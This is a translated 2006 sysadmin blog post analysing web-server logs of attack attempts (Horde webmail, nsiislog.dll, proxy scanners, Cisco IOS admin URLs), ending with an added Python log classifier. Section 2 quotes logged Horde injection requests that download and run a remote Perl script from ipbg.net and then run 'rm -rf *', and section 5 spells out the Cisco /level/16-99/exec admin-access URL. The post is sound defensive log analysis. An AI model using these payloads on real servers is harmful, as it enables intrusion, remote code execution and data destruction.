
  Web Logs of Web Attacks, Part 2    Posted : 2006/10/17 20:19

    Author   : 좋은진호 (truefeel, http://coffeenix.net/ )
    Written  : 2006.5.25 (Thu)~
    Compiled : 2006.9.18 (Mon)

    This is the second set of web log analysis(?) results, following 'Web Logs of Web Attacks'.
    A great many types of web attack logs have accumulated in the meantime, but many are hard to
    analyze clearly because no related material can be found. Analyzing and organizing every log
    is obviously impossible, and waiting until more analysis results were ready would have delayed
    this far too long, so I have written up at least a part. If I work out which attack attempt
    any of the previously recorded logs represents, I will add it to this article.
    For whether a web attack may actually have led to a compromise, please read my earlier article.
    http://coffeenix.net/board_view.php?bd_code=1352

    ※ This article's tables display best in MSIE.

    1. Logs left by the system monitoring tool What's Up

     
    210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
    210.xxx.xx.xxx - - [19/Apr/2006:17:35:33 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
     


    - These entries are connections made by What's Up, a Windows-based commercial monitoring tool,
      to check whether the web server is alive.

    References :
    * WhatsUp home page
      http://www.ipswitch.com/products/whatsup/index.asp

    2. Attacks exploiting a vulnerability in Horde, the open-source webmail

     
    201.219.7.xx - - [24/Apr/2006:00:08:53 +0900] "GET //README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde-3.0.9//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /Horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /mail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:57 +0900] "GET /webmail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.1//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.4//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.5//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.6//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.7//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.8//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


     
    216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:35 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    216.65.xx.xxx - - [30/Apr/2006:06:36:36 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


     
    196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /services/help/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    196.40.xx.xxx - - [23/Jun/2006:02:05:39 +0900] "GET /pub/horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
     


    - IP : Ecuador (RC, 201.219.7.0/24)
           USA (216.65.0.0 - 216.65.127.255)
           Costa Rica (CR, 196.40.85.128/25)

    References :

    3. Attacks exploiting the Windows Media Services ISAPI nsiislog.dll POST overflow vulnerability

     
    202.100.xxx.xxx - - [24/Apr/2006:11:53:13 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
    202.100.xxx.xxx - - [24/Apr/2006:11:53:54 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
     


    - IP : China (CN, 202.100.96.0 - 202.100.127.255)
    - The vulnerability was published in June 2003 and applies to Windows 2000 Server.
      If the server returns the string 'NetShow ISAPI Log Dll' in response to the request
      'GET /scripts/nsiislog.dll HTTP/1.0' on port 80, the system is vulnerable.

    References :
    * Microsoft Media Services ISAPI nsiislog.dll POST Overflow
      http://www.osvdb.org/4535
    * Windows Media Services Remote Command Execution #2
      http://archives.neohapsis.com/archives/bugtraq/2003-06/0211.html
    * Successful attack using MS03-022 vuln
      http://lists.sans.org/pipermail/unisog/2003-September/022422.html

    4. Proxy scanning logs from the proxy_scanner tool

     
    211.100.xx.xx - - [06/Jun/2006:21:17:38 +0900] "GET http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
    61.135.xxx.xxx - - [06/Jun/2006:23:43:32 +0900] "GET http://check.211.xxx.xxx.xx.v.80.PCN22.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
    211.100.xx.xx - - [02/Jul/2006:09:37:52 +0900] "GET http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"
     


    - IP : China (CN, 211.100.32.0 - 211.100.95.255)
           China (CN, 61.135.0.0 - 61.135.255.255)
    - These are requests made with 'proxy_scanner', a proxy scanning tool released by a Chinese
      hacker in 2004, to check whether the server can be used as a proxy.
    - The requested URL has the following format.
      http://check.$ip_address.v.80.(pdx8|PCN22|mt1|pw1).super.proxy.scanner.(i.thu.cn|ii.9966.org)/Provy_OK.html
      Every check...super.proxy.scanner.(i.thu.cn|ii.9966.org) host resolves to the IP 61.135.170.153,
      so apart from a few IPs (DNS and the like) the DNS appears to be configured as '* IN A 61.135.170.153'.
    - These web servers run lighttpd/1.4.11. (Easy to confirm by connecting to port 80 with telnet.)

    References :
    * What's a super.proxy.scanner and why is it in my logs?
      http://isc.sans.org/diary.php?storyid=1298
    * Proxy Probes
      http://www.splunk.com/splunkbin/426

    5. Attacks exploiting the Cisco IOS HTTP vulnerability that grants admin privileges

     
    81.225.xx.xx - - [29/Aug/2006:13:23:45 +0900] "GET /level/16/exec/show%20conf HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; PMF Master V3.0)"
     


    - IP : Sweden (SE, 81.224.0.0 - 81.236.255.255)
    - See the item '14. Attacks exploiting a very old HTTP vulnerability (2001) in Cisco switches'
      in the previous web log analysis article.
    - This vulnerability gives full admin privileges through URLs of the form
      http://Switch_IP/level/$NUMBER/exec/...., where $NUMBER in /level/$NUMBER/exec/... is a
      number between 16 and 99.
    - An automated tool called Cisco Global Exploiter exists for scanning for Cisco vulnerabilities.

    References :
    * Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
      http://www.securityfocus.com/bid/2936
    * Multiple Cisco Exploit Codes
      http://www.securiteam.com/exploits/5OP0L1FCAE.html
      http://downloads.securityfocus.com/vulnerabilities/exploits/ciscoMultipleVulnsExploit.pl
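
    The five log patterns covered in sections 1 to 5, as an added example that is not part of the
    original article: a classifier that labels access-log lines by the signatures the article points
    out. The label names, the classify/summarize functions and the sample lines are constructed for
    illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Log layout used in the article: ip - - [time] "request" status size "agent"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*)" \d{3} \S+ "([^"]*)"$')
PROXY_RE = re.compile(r'^http://check\.(.+?)\.v\.80\.(\w+)\.super\.proxy\.scanner\.', re.I)
CISCO_RE = re.compile(r'^/level/(\d+)/exec/', re.I)

def classify(line):
    """Return (client_ip, label, detail) for one log line, or None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, request, agent = m.groups()
    parts = request.split()  # some probes omit the protocol version
    target = unquote(parts[1]) if len(parts) >= 2 else ""
    low = target.lower()
    if agent.startswith("WhatsUp"):                      # section 1: monitoring, benign
        return ip, "whatsup-monitor", agent
    if low.endswith("/nsiislog.dll"):                    # section 3
        return ip, "nsiislog-probe", target
    if pm := PROXY_RE.match(target):                     # section 4: absolute-URI request
        return ip, "proxy-scanner", f"checked={pm.group(1)} tag={pm.group(2)}"
    if (cm := CISCO_RE.match(target)) and 16 <= int(cm.group(1)) <= 99:  # section 5
        return ip, "cisco-level-exec", target
    if "/services/help/" in low and "passthru(" in low:  # section 2: injected module value
        return ip, "horde-help-injection", target
    if "horde" in low or low.endswith("//readme") or "/services/help/" in low:
        return ip, "horde-probe", target
    return ip, "unclassified", target

def summarize(lines):  # hits per (client_ip, label); unparsable lines are skipped
    return Counter(r[:2] for r in map(classify, lines) if r)

# Constructed sample shaped like the article's excerpts (injection payload shortened).
UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
SAMPLE = [
    '210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"',
    f'201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde//README HTTP/1.1" 404 - "{UA}"',
    f'216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 - "{UA}"',
    f'196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22CMD%22);\'. HTTP/1.1" 404 - "{UA}"',
    '202.100.xxx.xxx - - [24/Apr/2006:11:53:13 +0900] "GET /scripts/nsiislog.dll" 404 - "-"',
    '211.100.xx.xx - - [06/Jun/2006:21:17:38 +0900] "GET http://check.211.xxx.xxx.xx.v.80.pdx8.super.proxy.scanner.ii.9966.org/Provy_OK.html HTTP/1.1" 404 - "-"',
    '81.225.xx.xx - - [29/Aug/2006:13:23:45 +0900] "GET /level/16/exec/show%20conf HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; PMF Master V3.0)"',
]

for (ip, label), n in sorted(summarize(SAMPLE).items()):
    print(f"{n:2d} {label:21s} {ip}")
```

    All requests in the article returned 404, so the labels describe what was attempted; a 200 on
    anything other than the monitoring check is the case that warrants a closer look.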
